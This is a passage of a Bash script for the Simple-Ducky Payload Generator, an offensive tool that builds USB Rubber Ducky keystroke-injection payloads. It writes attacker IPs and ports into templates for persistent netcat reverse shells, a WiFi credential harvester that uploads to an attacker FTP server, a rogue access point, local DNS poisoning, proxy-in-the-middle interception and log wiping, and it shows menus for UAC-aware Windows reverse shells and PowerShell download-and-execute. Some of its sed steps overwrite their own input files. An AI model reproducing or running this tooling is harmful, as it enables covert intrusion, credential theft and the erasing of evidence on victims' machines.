			echo ""
			clear
			echo -e "\e[1;34mAdding a persistant revervse shell to your payload...\e[0m"
			echo ""
			sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf
			sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf
			sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf
			sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf
			sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf
			cat /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf >> /usr/share/simple-ducky/payload.txt
			echo  >> /usr/share/simple-ducky/payload.txt
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del5.conf
			cp /usr/share/simple-ducky/misc/ncat.exe /var/www/
			echo ""
			echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m"
			echo "ncat -lvp $attackerport"
			echo ""
			read -p "Press Enter to continue..." contuinue
			f_attackadd
		elif [ "$shelltype" == "3" ]; then
			clear
			echo -e "\e[1;34mLet's configure some settings for the no download reverse shell.\e[0m"
			echo ""
			echo ""
			read -p "Where shall I send your shell? " attackerip
			echo ""
			read -p "What port will you be listening on? " attackerport
			echo ""
			clear
			echo -e "\e[1;34mAdding adding the no download shell to your payload...\e[0m"
			echo ""
			sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf
			sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf
			cat /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf >> /usr/share/simple-ducky/payload.txt
			echo  >> /usr/share/simple-ducky/payload.txt
			rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf
			echo ""
			echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m"
			echo "ncat -lvp $attackerport"
			echo ""
			read -p "Press Enter to continue..." contuinue
			f_attackadd
		fi
	fi
}

####### Proxy in the Middle Option ###########
f_pitmattack(){
	if [[ $osselect == 1 || $osselect = 2 || $osselect = 3 ]]; then
		clear
		echo -e "\e[1;34mLet's configure some settings for the Proxy in the Middle attack. Note, this will be the first option to run...\e[0m"
		echo ""
		echo ""
		read -p "What IP/domain would you like to use for your proxy server? " attackerip
		echo ""
		read -p "What port will you be using for your proxy server (example: 8081)? " attackerport
		echo ""
		clear
		echo -e "\e[1;34mAdding the Proxy in the Middle attack to your payload...\e[0m"
		echo ""
		sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7.conf > /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del1.conf
		sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf
		#echo  >> /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf
		cat /usr/share/simple-ducky/payload.txt >> /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf
		cp /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf /usr/share/simple-ducky/payload.txt
		rm /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del1.conf
		rm /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf
		echo ""
		echo -e "\e[1;34mSet the following options in Burp Suite...\e[0m"
		echo ""
		sleep 2
		echo ""
		echo '1) Select the "Proxy" tab'
		echo ""
		echo '2) Under "Intercept" ensure that "Intercept is off"'
		echo ""
		echo '3) Select the "Options" tab under "Proxy"'
		echo ""
		echo '4) Under "Proxy Listeners" select "Add" to add a new listener'
		echo ""
		echo "5) In the "Bind to port:" radio box put $attackerport"
		echo ""
		echo "6) Click the "Specific address:" radio button and select $attackerip / the attacking machines IP address"
		echo ""
		echo '7) Select the "History" tab to view the traffic from the victims machine'
		echo ""
		read -p "Press any key to contiue" enter
		echo ""
		echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m"
		echo ""
		sleep 3
	elif [[ $osselect == 4 || $osselect = 5 ]]; then
		clear
		echo -e "\e[1;34mLet's configure some settings for the Proxy in the Middle attack. Note, this will be the first option to run...\e[0m"
		echo ""
		echo ""
		read -p "What IP/domain would you like to use for your proxy server? " attackerip
		echo ""
		read -p "What port will you be using for your proxy server (example: 8081)? " attackerport
		echo ""
		clear
		echo -e "\e[1;34mAdding the Proxy in the Middle attack to your payload...\e[0m"
		echo ""
		sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8.conf > /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del1.conf
		sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del2.conf
		#echo  >> /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf
		cat /usr/share/simple-ducky/payload.txt >> /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis8_del2.conf
		cp /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis8_del2.conf /usr/share/simple-ducky/payload.txt
		rm /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del1.conf
		rm /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del2.conf
		echo ""
		echo -e "\e[1;34mSet the following options in Burp Suite...\e[0m"
		echo ""
		sleep 2
		echo ""
		echo '1) Select the "Proxy" tab'
		echo ""
		echo '2) Under "Intercept" ensure that "Intercept is off"'
		echo ""
		echo '3) Select the "Options" tab under "Proxy"'
		echo ""
		echo '4) Under "Proxy Listeners" select "Add" to add a new listener'
		echo ""
		echo "5) In the "Bind to port:" radio box put $attackerport"
		echo ""
		echo "6) Click the "Specific address:" radio button and select $attackerip / the attacking machines IP address"
		echo ""
		echo '7) Select the "History" tab to view the traffic from the victims machine'
		echo ""
		read -p "Press any key to contiue" enter
		echo ""
		echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m"
		echo ""
		sleep 3
	fi
		f_attackadd
}

####### WiFi Credential Harvest Option ###########
f_wificreds(){
	clear
	echo -e "\e[1;34mLet's configure some settings for the credential extraction...\e[0m"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	clear
	echo -e "\e[1;34mAdding the wifi credential extractor to your payload...\e[0m"
	echo ""
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/builder/main-attack/wificred.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del1.conf
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del2.conf
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del3.conf
	cat /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del3.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del1.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del2.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del3.conf
	echo ""
	echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m"
	echo ""
	sleep 3
	f_attackadd
}

####### Rogue Access Point Option ###########
f_rogueaccess(){
	clear
	echo -e "\e[1;34mLet's configure some settings for the rogue access point...\e[0m"
	echo ""
	echo ""
	read -p "What would you like the SSID to be? " attackerssid
	echo ""
	read -p "What would you like the AP's key to be? " attackerkey
	echo ""
	clear
	echo -e "\e[1;34mAdding the rogue access point option to your payload...\e[0m"
	echo ""
	sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del1.conf
	sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del2.conf
	cat /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del2.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del1.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del2.conf
	echo ""
	echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m"
	echo ""
	sleep 3
	f_attackadd
}

####### Auto Connect to Access Point Option ###########
f_autoassociate(){
	clear
	echo -e "\e[1;34mAdding the wifi auto connect option to your payload...\e[0m"
	echo ""
	sleep 3
	cat /usr/share/simple-ducky/payloads/builder/main-attack/wifiautoconnect.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	echo ""
	echo -e "\e[1;32mDone! Returning to the Main-Attack menu...\e[0m"
	echo ""
	echo -e "\e[1;33mThe victim will auto connect to: Pineapple\e[0m"
	echo ""
	read -p "Press Enter to continue..." continue
	f_attackadd
}

####### Local DNS Poisoning Option ###########
f_dnspoison(){
	clear
	echo -e "\e[1;34mLet's configure some settings for the DNS poisoning attack. Note: you run this as many times as you would like..\e[0m"
	echo ""
	echo ""
	read -p "What is the IP address of your attacking webserver? " attackerip
	echo ""
	read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain
	echo ""
	clear
	echo -e "\e[1;34mAdding DNS poisoning to your payload...\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/localdns.conf > /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del1.conf
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del2.conf
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del3.conf
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del3.conf > /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del4.conf
	cat /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del4.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del1.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del2.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del3.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del4.conf
	echo ""
	echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m"
	echo ""
	sleep 3
	f_attackadd
}
############ Post Attack Option Add ###########################

####### Clear all logs Option ###########
f_clearlogs(){
	clear
	echo -e "\e[1;34mAdding the clear all logs option to your payload...\e[0m"
	echo ""
	sleep 3
	cat /usr/share/simple-ducky/payloads/builder/post-attack/clearlogs.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	echo ""
	echo -e "\e[1;32mDone! Returning to the Post-Attack menu...\e[0m"
	echo ""
	sleep 3
	f_postattackadd
}

####### Inject.bin ###########
f_injectcreate(){
	clear
	echo -e "\e[1;34mHow would you like to exit?\e[0m"
	echo ""
	echo '1. Exit the command prompt and the leave the machine "as is"'
	echo "2. Exit the command prompt and lock the screen"
	echo ""
	read -p "Option: " exitoption

	if [ "$exitoption" == "1" ]; then
		clear
		echo -e "\e[1;34mHow long of a delay would like before starting?\e[0m "
		read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
		echo ""
		clear
		echo -e "\e[1;34mFinalizing your payload...\e[0m"
		echo ""
		sleep 3
		cat /usr/share/simple-ducky/payloads/builder/post-attack/finish.conf >> /usr/share/simple-ducky/payload.txt
		sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
		sed '/^$/d' /usr/share/simple-ducky/payload.txt >> /usr/share/simple-ducky/payload1.txt
		cat /usr/share/simple-ducky/payload1.txt > /usr/share/simple-ducky/payload.txt
		rm /usr/share/simple-ducky/payload1.txt
		echo ""
		echo -e "\e[1;32mDone! Let's generate your inject.bin...\e[0m"
		echo ""
		sleep 3
	elif [ "$exitoption" == "2" ]; then
		clear
		echo -e "\e[1;34mHow long of a delay would like before starting?\e[0m "
		read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
		echo ""
		clear
		echo -e "\e[1;34mFinalizing your payload...\e[0m"
		echo ""
		sleep 3
		cat /usr/share/simple-ducky/payloads/builder/post-attack/finishlock.conf >> /usr/share/simple-ducky/payload.txt
		sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
		sed '/^$/d' /usr/share/simple-ducky/payload.txt >> /usr/share/simple-ducky/payload1.txt
		cat /usr/share/simple-ducky/payload1.txt > /usr/share/simple-ducky/payload.txt
		rm /usr/share/simple-ducky/payload1.txt
		echo ""
		echo -e "\e[1;32mDone! Let's generate your inject.bin...\e[0m"
		echo ""
		sleep 3
	fi
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mI'm going to make sure that your FTP and Webserver are running.\e[0m"
	echo ""
	sleep 3
	service pure-ftpd start
	service apache2 start
	echo ""
	echo -e "\e[1;32mYour FTP and Webserver are running.\e[0m"
	echo ""
	read -p "Press Enter to return to the main menu"
	xdg-open /usr/share/simple-ducky/ &
	clear
	f_mainmenu
}

#################################################################################
# Dependency Installer
#################################################################################
f_installer(){
clear
echo -e "\e[1;34m[*] Performing an APT Update prior to installing dependencies...\e[0m\n"
sleep 3
apt-get update
echo ""
echo -e "\e[1;32m[+] APT Update complete...\e[0m"
sleep 3
clear

echo -e "\e[1;34m[*] Please wait while I install some dependencies...\e[0m\n"
sleep 3
updatedb
mkdir /tmp/simple-ducky/
echo ""

	machine=$(cat /etc/issue)
	if [ "$machine" == "Kali GNU/Linux 1.0 \n \l" ]; then
		echo -e "\n\e[1;34m[*] I see that you are using Kali-Linux. This will only take a few moments...\e[0m"
		echo ""
		sleep 3
		f_kaliinstall
	else
		f_otherdebian
	fi

}

########################################################
# Kali Install
########################################################
f_kaliinstall(){
	reqs="pure-ftpd dfu-programmer burpsuite mingw32"
	for i in $reqs; do
		dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt
		isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed")
		if [ ! -e /usr/bin/$i ] && [ ! -e /usr/sbin/$i ] && [ ! -e /usr/local/sbin/$i ] && [ ! -e /usr/local/bin/$i ] && [ -z "$isinstalled" ]; then
				echo -e "\e[1;33m[-] It doesn't appear that $i is installed on your system. Installing it now...\e[0m"
				echo ""
			if [ ! -z $(apt-get install -y "$i" | grep -o "E: Couldn") ]; then
				echo -e "\e[1;31m[-] I had a hard time installing $i from the Kali-Linux repository.\e[0m"
				touch /tmp/simple-ducky/$i-fail
			else
				dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt
				isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed")
				if [ ! -z "$isinstalled" ]; then
					update=1
					echo -e "\e[1;32m[+] Good news, $i installed without any issues.\e[0m"
					echo ""
					sleep 2
				else
					echo ""
					echo -e "\e[1;31m[!] It doesn't appear that I will be able to install $i right now.\e[0m"
					echo ""
					sleep 2
				fi
			fi
		else
			echo -e "\e[1;32m[+] $i is already installed on your system, moving on...\e[0m"
			echo ""
			sleep 2
		fi
	done
f_java

}

########################################################
# Other Debian Install
########################################################
f_otherdebian(){
	reqs="pure-ftpd file-roller dfu-programmer apache2 burpsuite nmap p7zip-full mingw32"
	for i in $reqs; do
		dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt
		isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed")
		if [ ! -e /usr/bin/$i ] && [ ! -e /usr/sbin/$i ] && [ ! -e /usr/local/sbin/$i ] && [ ! -e /usr/local/bin/$i ] && [ -z "$isinstalled" ]; then
				echo -e "\e[1;33m[-] It doesn't appear that $i is installed on your system. Installing it now...\e[0m"
				echo ""
			if [ ! -z $(apt-get install -y "$i" | grep -o "E: Couldn") ]; then
				echo -e "\e[1;31m[-] I had a hard time installing $i from the Kali-Linux repository.\e[0m"
				touch /tmp/simple-ducky/$i-fail.txt
			else
				dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt
				isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed")
				if [ ! -z "$isinstalled" ]; then
					update=1
					echo -e "\e[1;32m[+] Good news, $i installed without any issues.\e[0m"
					echo ""
					sleep 2
				else
					echo ""
					echo -e "\e[1;31m[!] It doesn't appear that I will be able to install $i right now.\e[0m"
					echo ""
					sleep 2
				fi
			fi
		else
			echo -e "\e[1;32m[+] $i is already installed on your system, moving on...\e[0m"
			echo ""
			sleep 2
		fi
	done

f_metasploit
}

########################################################
# Metasploit
########################################################
f_metasploit(){
clear
echo -e "\e[1;34m[*] Checking to see if Metasploit is installed...\e[0m\n"
if [ ! -e /usr/bin/msfconsole ] && [ ! -e /usr/sbin/msfconsole ] && [ ! -e /usr/local/sbin/msfconsole ] && [ ! -e /usr/local/bin/msfconsole ]; then
	update=1
	echo -e "\n\e[1;34m[*] It doesn't appear that Metasploit is installed on your system. Installing it now...\e[0m"
	echo ""
	machine=$(uname -m)
	if [ "$machine" == "x86_64" ]; then
		wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run -O /tmp/simple-ducky/metasploit-latest-linux-x64-installer.run
		echo -e "\n\e[1;33m[*] Launching the Metasploit installer. Select all the defaults and DONT launch the web UI...\e[0m"
		echo ""
		sleep 3
		chmod 755 /tmp/simple-ducky/metasploit-latest-linux-x64-installer.run
		/tmp/simple-ducky/metasploit-latest-linux-x64-installer.run
	else
		wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run -O /tmp/simple-ducky/metasploit-latest-linux-installer.run
		echo -e "\n\e[1;33m[*] Launching the Metasploit installer. Select all the defaults and DONT launch the web UI...\e[0m"
		echo ""
		sleep 3
		chmod 755 /tmp/simple-ducky/metasploit-latest-linux-installer.run
		/tmp/simple-ducky/metasploit-latest-linux-installer.run
	fi

	cd /usr/bin
	msfprogs="msfconsole msfupdate msfencode msfpayload"
	for z in $msfprogs; do
		if [ ! -e /usr/bin/$z ]; then
			ln -f -s /usr/local/bin/$z $z
		fi
	done
fi
echo -e "\e[1;32m[+] Good news, Metasploit installed without any issues.\e[0m"
echo ""
sleep 2

f_setoolkit
}

########################################################
# SE-Toolkit
########################################################
f_setoolkit(){
clear
echo -e "\e[1;34m[+] Checking to see if the Social Engineering Toolkit is installed...\e[0m\n"
echo ""
sleep 4
	dpkg -s "set" &> /tmp/simple-ducky/set-install.txt
	setoolkit=$(cat /tmp/simple-ducky/set-install.txt | grep -o "Status: install ok installed")
	if [ "$setoolkit" == "Status: install ok installed" ]; then
	echo -e "\e[1;32m[+]  The SE-Toolkit is already installed on your system, moving on...\e[0m"
		echo ""
		sleep 4
	else
		echo -e "\e[1;33m[-] It doesn't appear that the SE-Toolkit is installed on your system. Installing it now...\e[0m"
		echo -e ""
		sleep 3
		git clone https://github.com/trustedsec/social-engineer-toolkit/ /tmp/simple-ducky/set/
		chmod 755 /tmp/simple-ducky/set/setup.py
		python /tmp/simple-ducky/set/setup.py install
		echo ""
		echo -e "\e[1;32m[+] Good news, the SE-Toolkit installed without any issues.\e[0m"
		echo ""
		sleep 2
	fi


bsuite=$(cat /tmp/simple-ducky/burpsuite-install.txt | grep -o "is not installed" )
	if [ "$bsuite" == "is not installed" ]; then
		f_burpsuite
	else
		f_java
fi
}

########################################################
# Burpsuite
#######################################################
f_burpsuite(){
	clear
	echo -e "\e[1;34mTrying a different approach to install Burpsuite...\e[0m\n"
	echo ""
	sleep 3
	mkdir /usr/share/burpsuite/
	wget http://portswigger.net/burp/burpsuite_free_v1.5.jar -O /usr/share/burpsuite/burpsuite.jar
	chmod 755 /usr/share/burpsuite/burpsuite.jar
	ln -s /usr/share/burpsuite/burpsuite.jar /usr/bin/burpsuite.jar
	echo ""
	echo -e "\e[1;32m[+] Good news, Burpsuite installed without any issues.\e[0m"
	sleep 3
	clear
f_java
}

########################################################
# JavaInstall
########################################################
f_java(){
clear
echo -e "\e[1;34m[+] Checking your JDK version, I will update it if needed...\e[0m\n"
echo ""
sleep 4
	java -version &> /tmp/simple-ducky/java-version.txt
	javainstall=$(cat /tmp/simple-ducky/java-version.txt | grep -o "1.7.0")
	if [ "$javainstall" == "1.7.0" ]; then
		echo -e "\e[1;32m[+] It looks like your JDK is up to date, moving on..."
		sleep 4
	else
		echo -e "\e[1;33m[+] It looks like we need to update JDK to version 1.7.0\e[0m"
		echo -e ""
		sleep 3
		apt-get install -y openjdk-7-jre-headless
		echo ""
		echo -e "\e[1;33m[*] When prompted select the option for: '...java-7-openjdk...'\e[0m"
		echo ""
		sleep 4
		update-alternatives --config java
		echo ""
		echo -e "\e[1;32m[+] Your new JDK version is...\e[0m"
		echo ""
		java -version
		sleep 5
		clear
	fi
f_cleanupexit

}
#################################################################################
# Cleanup and Return to the Main Menu
#################################################################################
f_cleanupexit(){
	echo ""
	echo -e "\e[1;32m[+] The installation process is complete! Returning to the main menu...\e[0m"
	echo ""
	sleep 5
	rm -rf /tmp/simple-ducky/
	clear
	f_mainmenu
}

#################################################################################
#################################################################################
#
# Menu Section
#
#################################################################################
#################################################################################

#################################################################################
# Main Menu - Banner
#################################################################################
f_banner(){
	clear
	echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m "
	echo -e "Get your USB Rubber Ducky @ http://hakshop.myshopify.com/"
	echo -e "If you would like to submit your payload send it to skysploit@gmail.com"
	echo -e "\e[1;31mHak5 forums:\e[0m http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/"
	echo -e "\e[1;31mSimple-Ducky:\e[0m https://code.google.com/p/simple-ducky-payload-generator/"
	echo -e "\e[1;31mDucky-Decode:\e[0m https://code.google.com/p/ducky-decode/"
	echo -e "\e[1;31mSimple-Ducky Author:\e[0m Travis Weathers (skysploit) | skysploit@gmail.com"
	echo -e "\e[1;31mEncoder by:\e[0m ApacheTech & Midnitesnake \e[1;31mEncoder Version:\e[0m v2.6"
	echo -e "\e[1;31mLast Modified:\e[0m 22 JUN 2013 \e[1;31mSimple-Ducky Version:\e[0m v1.1.1"
	echo -e ""
}

#################################################################################
# Main Menu - Options
#################################################################################
f_mainmenu(){

f_banner
	echo -e "\e[1;34mWhere would you like to start?\e[0m"
	echo ""
	echo "1. Custom Payload Builder"
	echo "2. Windows Reverse Shell Payloads"
	echo "3. WiFi Attacks"
	echo "4. Password Attacks"
	echo "5. Linux & OS X Payloads"
	echo "6. Forced Phishing & Web Attacks"
	echo "7. Clean up the Encoder directory"
	echo "8  Executables with Durandal Backdoor (DBD)"
	echo "9. Dependency Checker"
	echo "10.FTP Server Setup/User Add"
	echo "11.LM/NTLM Password Hasher"
	echo "12.Site2lst Custom Wordlist Builder"
	echo "13.Quit"
	echo ""
	read -p "Option: " option

	case $option in
	1) f_payloadbuilder ;;
	2) f_windowsshellmenu ;;
	3) f_wifimenu ;;
	4) f_passwordmenu ;;
	5) f_linuxosxmenu ;;
	6) f_forcedphishmenu ;;
	7) f_cleanup ;;
	8) f_dbdbuilder ;;
	9) f_installer ;;
	10) f_ftpsetup ;;
	11) f_lmntlmhasher ;;
	12) f_site2lst ;;
	13) clear;exit ;;
	adv) f_advancedmenu ;;
	*) clear;exit ;;

	esac

}

#################################################################################
# Windows Reverse Shell - Banner
#################################################################################
f_winshellbanner(){
	clear
	echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m "
	echo -e "Windows reverse shell payloads of various types"
	echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo -e ""
}

#################################################################################
# Windows Reverse Shell - Options
#################################################################################
f_windowsshellmenu(){

f_winshellbanner
	echo -e "\e[1;34mWhat payload would you like to use?\e[0m"
	echo ""
	echo "1. DBD Reverse SYSTEM Shell (SSL & Persistant) (Win Vista/7)"
	echo "2. DBD Reverse SYSTEM Shell (SSL & Persistant) (Win 8)"
	echo "3. Persistence Reverse Shell (Win Vista/7)"
	echo "4. Persistence Reverse Shell (Win 8)"
	echo "5. Windows Reverse Shell (No Download|W2K/XP)"
	echo "6. Windows Reverse Shell (No Download|Win Vista/7)"
	echo "7. Windows Reverse Shell (No Download|Win 8)"
	echo "8. Powershell Download & Execute (User Priv Shell|Win Vista/7)"
	echo "9. Powershell Download & Execute (Admin Priv Shell|Win Vista/7)"
	echo "10.Powershell Download & Execute (User Priv Shell|Win 8)"
	echo "11.Powershell Download & Execute (Admin Priv Shell|Win 8)"
	echo "12.Return to Main Menu"
	echo "13.Quit"
	echo ""
	read -p "Option: " option

	if [ "$option" == "1" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_windowsdbdVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_windowsdbdVIS7nouac
		fi
	elif [ "$option" == "2" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_windowsdbdwin8uac
		elif [ "$uacenabled" == "n" ]; then
			f_windowsdbdwin8nouac
		fi
	elif [ "$option" == "3" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_persistenceVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_persistenceVIS7nouac
		fi
	elif [ "$option" == "4" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_persistenceWIN8uac
		elif [ "$uacenabled" == "n" ]; then
			f_persistenceWIN8nouac
		fi
	elif [ "$option" == "5" ]; then
		f_windowsrevW2KXP
	elif [ "$option" == "6" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_windowsrevVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_windowsrevVIS7nouac
		fi
	elif [ "$option" == "7" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_windowsrevWIN8uac
		elif [ "$uacenabled" == "n" ]; then
			f_windowsrevWIN8nouac
		fi
	elif [ "$option" == "8" ]; then
		f_powershellVIS7
	elif [ "$option" == "9" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_powershellVIS7admuac
		elif [ "$uacenabled" == "n" ]; then
			f_powershellVIS7admnouac
		fi
	elif [ "$option" == "10" ]; then
		f_powershellWIN8
	elif [ "$option" == "11" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
